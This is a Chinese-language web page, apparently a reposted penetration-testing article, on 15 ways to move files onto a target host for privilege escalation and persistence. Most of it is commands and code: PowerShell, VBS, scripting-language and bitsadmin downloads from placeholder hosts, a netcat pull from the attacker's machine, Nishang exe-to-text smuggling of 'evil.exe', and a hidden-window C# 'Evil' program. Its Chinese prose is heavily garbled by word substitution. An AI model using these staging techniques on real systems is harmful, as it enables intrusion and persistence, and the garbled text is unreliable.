|
|
|
联系客服020-83701501

收集整理的15种文件下载的方式

联系在线客服,可以获得免费在线咨询服务。 QQ咨询 我要预约
征集整顿的15种文件下载的举措

在咱们的渗透过程当中,通常会须要向指标主机通报一些文件,来到达提权,坚持管束等目标。本篇文章将会介绍15种下载文件的法子。

PowerShell File Download

PowerShell 是一种winodws原生的脚本说话,关于纯熟垄断它的人来讲,梗概完成不少容易的功用。

在windows 2003当中默认支持这类脚本。

下面这两条指令完成了从网络网络下载一个文件。

Default
12 $p = New-Object System.Net.WebClient$p.DownloadFile("http://domain/file" "C:\%homepath%\file")

下面这条指令是实行一个文件

Default
1 PS C:\> .\test.ps1

有的时候PowerShell的实行权限会被封闭,须要垄断如下的语句翻开。

Default
1 C:\>powershell set-executionpolicy unrestricted

Visual Basic File Download

在1998年Visual Basic最终标准在windows上确定。下面的代码梗概完成下载文件,当然它的长度比Powershell长多了。

Default
123456789101112 Set args = Wscript.ArgumentsUrl = "http://domain/file"dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")dim bStrm: Set bStrm = createobject("Adodb.Stream")xHttp.Open "GET", Url, FalsexHttp.Sendwith bStrm    .type = 1 '    .open    .write xHttp.responseBody    .savetofile " C:\%homepath%\file", 2 'end with

在windows中Cscript指令梗概许诺你实行VBS脚本文件概略对script脚本做一些设置。在windows 7中这个指令其实不是必必要用到。 然而在windows XP中须要垄断这条指令,如下所示。

C:>cscript test.vbs

如下四种说话都不是零碎原生脚本,然而如果你的指标凝滞陈设了这些说话,你便梗概垄断他们来下载文件。

Perl File Download

Perl是一门很吊的说话,垄断它根蒂梗概完成任何事情,用它完成文件下载也很冗杂。

Default
1234 #!perl#!/usr/bin/perluse LWP::Simple;getstore("http://domain/file", "file");

实行脚本文件是多么

Default
1 root@kali:~# perl test.pl

Python File Download

Python也是很受欢送的主流脚本说话,代码懂得且简洁。

Default
1234567 #!python#!/usr/bin/pythonimport urllib2u = urllib2.urlopen('http://domain/file')localFile = open('local_file', 'w')localFile.write(u.read())localFile.close()

实行脚本文件是多么

Default
1 root@kali:~# python test.py

Ruby File Download

Ruby是一个面对器械的说话,Metasploit框架即是用它来完成的,虽然他也梗概完成像下载文件多么的小任务。

Default
123456789 #!ruby#!/usr/bin/rubyrequire 'net/http'Net::HTTP.start("www.domain.com") { |http|r = http.get("/file")open("save_location", "wb") { |file|file.write(r.body)}}

实行脚本文件是多么

Default
1 root@kali:~# ruby test.rb

PHP File Download

PHP作为一种办事端脚本,也梗概完成下载文件这类功用。

Default
12345678 #!/usr/bin/php<?php        $data = @file("http://example.com/file");        $lf = "local_file";        $fh = fopen($lf, 'w');        fwrite($fh, $data[0]);        fclose($fh);?>

实行脚本文件是多么

Default
1 root@kali:~# php test.php

下面的上传文件的法子,或者须要更多得挨次,然而有些环境下却梗概绕从前多限制。

FTP File Download

一般环境下打击者垄断FTP上传文件须要不少交互的挨次,下面这个 bash脚本,思索到了交互的环境,梗概直接实行其实不会孕育产生交互方式。

Default
12345 ftp 127.0.0.1usernamepasswordget fileexit

TFTP File Download

在Windows Vista以及以后的版本中默认有FTP,梗概垄断如下呼吁运行:

Default
1 tftp -i host GET C:\%homepath%\file location_of_file_on_tftp_server

Bitsadmin File Download

Bitsadmin是Windows呼吁行东西,用户梗概垄断它来创立下载或上传的任务。

Default
1 bitsadmin /transfer n http://domain/file c:\%homepath%\file

Wget File Download

Wget是Linux和Windows下的一个东西,许诺非交互下载。

Default
1 wget http://example.com/file

Netcat File Download

Netcat在linux上的实例:

打击者的电脑上输入:

Default
1 cat file | nc -l 1234

这个呼吁会将file的形式输入到外埠的1234端口中,然后不管谁联接此端口,file的形式将会发送到联接从前的IP。

指标电脑上的呼吁:

Default
1 nc host_ip 1234 > file

这条呼吁将联接打击者的电脑,蒙受file形式保留。

Windows Share File Download

Windows shares梗概加载一个驱动器,然后用呼吁来复制文件。

加载短途驱动:

Default
1 net use x: \\127.0.0.1\share /user:example.com\userID myPassword

Notepad Dialog Box File Download

如果你有权限接入一台(短途联接概略物理机)电脑,然而你用户权限不许诺翻开涉猎器,这类举措梗概让你疾速的从一个URL概略UNC路径当中下载文件。

1.翻开notepad 2.点击file – open

在File Name当中输入残缺的URL:

Notepad将会获得URL的形式展现进去。

Exe to Txt, and Txt to Exe with PowerShell and Nishang

http://code.谷歌.com/p/nishang/downloads/list

当须要把一个exe文件放到指标共计机上时,这或者是我最喜欢的东西,Nishang垄断PowerShell许诺你吧一个exe转换成hex,然后吧hex再转换成正本的exe文件。

把exe转成hex文件输入:

Default
1 PS > .\ExetoText.ps1 evil.exe evil.txt

翻开evil.txt文件,复制形式,然后经过RDP的剪贴板复制进指标共计机。

把hex文件还原成exe文件输入:

Default
1 PS > .\TexttoExe.ps1 evil.text evil.exe

Csc.exe to Compile Source from a File

C的编译器(CSC)是搜聚在在Windows微软.NET陈设中的呼吁行编译器。

这个可实行文件的默认地位是如下环境:

Default
1 C:\Windows\Microsoft.NET\Framework\version

垄断下面的示例代码,编译后的可实行文件将垄断的cmd.exe来究诘外埠用户,然后将下场写入一个在C:\Temp\users.txt中。梗概修改个中的代码,到达本人想要的目标,然后编译成exe文件。

Default
12345678910111213 public class Evil{   public static void Main()   {      System.Diagnostics.Process process = new System.Diagnostics.Process();      System.Diagnostics.ProcessStartInfo startInfo = new System.Diagnostics.ProcessStartInfo();      startInfo.WindowStyle = System.Diagnostics.ProcessWindowStyle.Hidden;      startInfo.FileName = "cmd.exe";      startInfo.Arguments = "/C net users > C:\\Temp\\users.txt";      process.StartInfo = startInfo;      process.Start();   }}

代码编译呼吁:

Default
1 csc.exe /out:C:\evil\evil.exe C:\evil\evil.c

作者: Hero

数安新闻+更多

证书相关+更多